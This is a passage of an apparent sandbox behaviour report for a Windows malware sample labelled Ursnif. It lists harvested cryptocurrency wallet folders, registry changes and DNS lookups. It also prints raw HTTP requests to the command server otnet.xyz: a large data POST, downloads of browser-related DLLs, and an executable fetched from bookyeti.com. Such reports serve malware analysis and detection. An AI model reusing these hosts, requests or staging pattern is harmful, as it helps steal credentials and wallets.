- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "otnet.xyz",
- "answers":
- "data": "209.141.47.33",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- "type": "A",
- "request": "bookyeti.com",
- "answers":
- "data": "199.204.213.10",
- "type": "A"
- * Domains:
- "ip": "209.141.47.33",
- "domain": "otnet.xyz"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- "ip": "199.204.213.10",
- "domain": "bookyeti.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://otnet.xyz/141",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/141",
- "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll",
- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll?ddosprotected=1",
- "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 2,
- "body": "",
- "uri": "http://otnet.xyz/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40781\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://bookyeti.com/img/3001.exe",
- "user-agent": "",
- "method": "GET",
- "host": "bookyeti.com",
- "version": "1.1",
- "path": "/img/3001.exe",
- "data": "GET /img/3001.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: bookyeti.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement